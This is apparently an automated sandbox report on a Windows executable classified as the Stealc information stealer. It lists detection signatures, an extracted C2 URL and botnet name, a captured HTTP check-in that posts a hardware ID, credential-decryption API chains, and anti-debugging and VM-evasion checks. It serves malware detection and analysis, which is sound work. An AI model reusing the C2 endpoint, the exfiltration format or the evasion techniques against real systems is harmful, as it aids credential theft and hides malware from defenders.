
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1531682
MD5: 1ad0ccf6d6aa03ebe1f0d87e2b21e748
SHA1: a48f39c5b5a61d2aabf0d98844041e6b8ee3861e
SHA256: 3b22774fae4edcd3086ddfda63b8d6a7b469081f69845521570dc42f70a05e4d
Tags: exe user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6280 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1AD0CCF6D6AA03EBE1F0D87E2B21E748)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 6280 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 6280 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.530000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-11T16:00:06.089634+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.530000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_0053C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00537240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00537240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00539AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00539AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00539B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00539B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00548EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00548EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_005438B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00544910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00544910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0053DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0053E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00544570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00544570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0053ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0053BE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0053DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_005316D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0053F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0053F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00543EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00543EA0

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 45 31 30 44 46 44 33 42 38 45 33 39 38 34 32 31 32 34 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="hwid"37E10DFD3B8E3984212470------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="build"doma------DGHJEHJJDAAAKEBGCFCA--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00534880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00534880
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 45 31 30 44 46 44 33 42 38 45 33 39 38 34 32 31 32 34 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="hwid"37E10DFD3B8E3984212470------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="build"doma------DGHJEHJJDAAAKEBGCFCA--
Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/&
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/BiQ
Source: file.exe, 00000000.00000002.1741085256.0000000001224000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/C84BCA9C91821060E9A79u
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpConnectionSettings
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpF
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpJ
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phphi
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37oZ

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081B0A6 | 0_2_0081B0A6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008EF9B7 | 0_2_008EF9B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084B1E2 | 0_2_0084B1E2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CD1AD | 0_2_007CD1AD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008222FE | 0_2_008222FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00904214 | 0_2_00904214
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00900BA0 | 0_2_00900BA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007DFD84 | 0_2_007DFD84
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008FD63E | 0_2_008FD63E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008FA637 | 0_2_008FA637
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00881745 | 0_2_00881745
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081EF62 | 0_2_0081EF62
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 005345C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: iinbofzt ZLIB complexity 0.9948670885464936
Source: file.exe, 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00549600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00549600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00543720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00543720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OU5DW4AE.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1813504 > 1048576
Source: file.exe | Static PE information: Raw size of iinbofzt is bigger than: 0x100000 < 0x194a00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.530000.0.unpack :EW;.rsrc :W;.idata :W; :EW;iinbofzt:EW;gnwcqqyo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;iinbofzt:EW;gnwcqqyo:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00549860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00549860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1bb645 should be: 0x1bad49
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: iinbofzt
Source: file.exe | Static PE information: section name: gnwcqqyo
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A150B8 push edx; mov dword ptr [esp], 5FBE8D00h | 0_2_00A150EE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A150B8 push 6CD5B4B7h; mov dword ptr [esp], esi | 0_2_00A151B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00990084 push edx; mov dword ptr [esp], esi | 0_2_0099014A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081B0A6 push 06CB0136h; mov dword ptr [esp], esi | 0_2_0081B17C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0081B0A6 push esi; mov dword ptr [esp], 59B914C9h | 0_2_0081B192
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009908F9 push 10C74FE0h; mov dword ptr [esp], eax | 0_2_00990930
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0054B035 push ecx; ret | 0_2_0054B048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009790E7 push 3A35086Fh; mov dword ptr [esp], edi | 0_2_00979106
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009790E7 push 5C194CE4h; mov dword ptr [esp], esi | 0_2_0097913D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A13804 push 233AAE31h; mov dword ptr [esp], ecx | 0_2_00A13831
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0097D024 push 6477A542h; mov dword ptr [esp], edi | 0_2_0097D0F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00974057 push 3A240A94h; mov dword ptr [esp], ecx | 0_2_00974076
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0088487C push ebx; mov dword ptr [esp], 00000000h | 0_2_00884911
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093B869 push 1E2E79E6h; mov dword ptr [esp], esi | 0_2_0093B8A3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009BA989 push ecx; mov dword ptr [esp], ebx | 0_2_009BA9BB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00951180 push esi; mov dword ptr [esp], ecx | 0_2_009511CB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00951180 push ebp; mov dword ptr [esp], eax | 0_2_009511D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009999BB push ebp; mov dword ptr [esp], 384CD99Dh | 0_2_00999A1F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CF1AD push ecx; mov dword ptr [esp], ebx | 0_2_009CF1D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008EF9B7 push 32EDA461h; mov dword ptr [esp], ebx | 0_2_008EF9E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008EF9B7 push eax; mov dword ptr [esp], ecx | 0_2_008EFA41
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008EF9B7 push 43A76670h; mov dword ptr [esp], ebx | 0_2_008EFA49
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008EF9B7 push eax; mov dword ptr [esp], ebx | 0_2_008EFA8D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009081F5 push 58972CD5h; mov dword ptr [esp], ecx | 0_2_009081FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084B1E2 push 1CD28792h; mov dword ptr [esp], edi | 0_2_0084B1EB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084B1E2 push 0890CBDAh; mov dword ptr [esp], eax | 0_2_0084B2CD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084B1E2 push edx; mov dword ptr [esp], edi | 0_2_0084B31C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0084B1E2 push esi; mov dword ptr [esp], 5FFB9B9Fh | 0_2_0084B34B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CC150 push ebp; mov dword ptr [esp], edx | 0_2_009CC24A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CC150 push 3214D443h; mov dword ptr [esp], ebx | 0_2_009CC252
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CD1AD push ecx; mov dword ptr [esp], 2ADFF4EBh | 0_2_007CD1C4
Source: file.exe | Static PE information: section name: iinbofzt entropy: 7.954146839777977

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00549860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00549860

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13448
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 791B46 second address: 791B4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90068A second address: 90068E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90068E second address: 900694 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 900694 second address: 90069E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90069E second address: 9006A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 791B5C second address: 791B60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90AC61 second address: 90AC65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90AEF2 second address: 90AEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90AEFB second address: 90AF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90AF01 second address: 90AF05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90B475 second address: 90B47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90B47B second address: 90B47F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90B47F second address: 90B48B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FFBC8B2DA96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90B48B second address: 90B4A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBC91A3BE7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90B4A6 second address: 90B4E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007FFBC8B2DA96h 0x00000010 jne 00007FFBC8B2DA96h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jno 00007FFBC8B2DA98h 0x00000023 jmp 00007FFBC8B2DA9Ch 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90DB11 second address: 90DB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
